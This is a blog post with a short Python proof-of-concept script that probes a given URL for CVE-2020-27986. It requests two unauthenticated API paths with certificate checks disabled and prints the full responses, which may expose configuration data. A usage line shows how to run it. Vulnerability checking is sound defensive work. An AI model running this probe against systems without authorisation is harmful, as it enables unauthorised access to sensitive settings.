Next time: CVE-2021-41773, CVE-2021-42013 detection script_dreamthe's Blog-CSDN Blog
A simple script to detect the CVE-2020-27986 vulnerability written by myself. for reference only
import argparse
import json
import sys
import requests
def options():
parser = argparse.ArgumentParser()
parser.add_argument('-m', '--module', default='', dest='action_name', required=True,
help='模块的英文名称, 必填参数')
parser.add_argument('-d', '--dict', dest='json_data', required=True,
help='目标url')
parser.add_argument('-v', '--version', action='version', version='%(prog)s 1.0')
params = parser.parse_args()
execute(params.action_name, json_data=params.json_data)
def usage():
print('''
へ /|
/\7 ∠_/
/ │ / /
│ Z _,< / /`ヽ
│ ヽ / 〉
Y ` / /
イ● 、 ● ⊂⊃〈 /
() へ | \〈
>ー 、_ ィ │ //
/ へ / ノ<| \\
ヽ_ノ (_/ │//
7 |/
>―r ̄ ̄`ー―_
''')
print('\n')
def execute(action_name, json_data):
if action_name == 'CVE-2020-27986':
result = CVE_2020_27986(json_data)
else:
result = []
print(result)
return result
def CVE_2020_27986(url):
headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0",
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'Accept-Encoding': 'gzip, deflate',
'Upgrade-Insecure-Requests': '1'
}
payload = ['/api/settings/values', '/api/webservices/list']
for poc in payload:
target_url = url + poc
try:
res = requests.get(url=target_url, headers=headers, verify=False, timeout=5)
result = {'url': target_url, 'code': res.status_code,'data': res.text}
return result
except Exception as e:
print(e)
if __name__ == '__main__':
usage()
options()
Instructions:
Open cmd and enter the command python3 environment
python pocscheckr.py -m CVE-2020-27986 -d http://www.example.com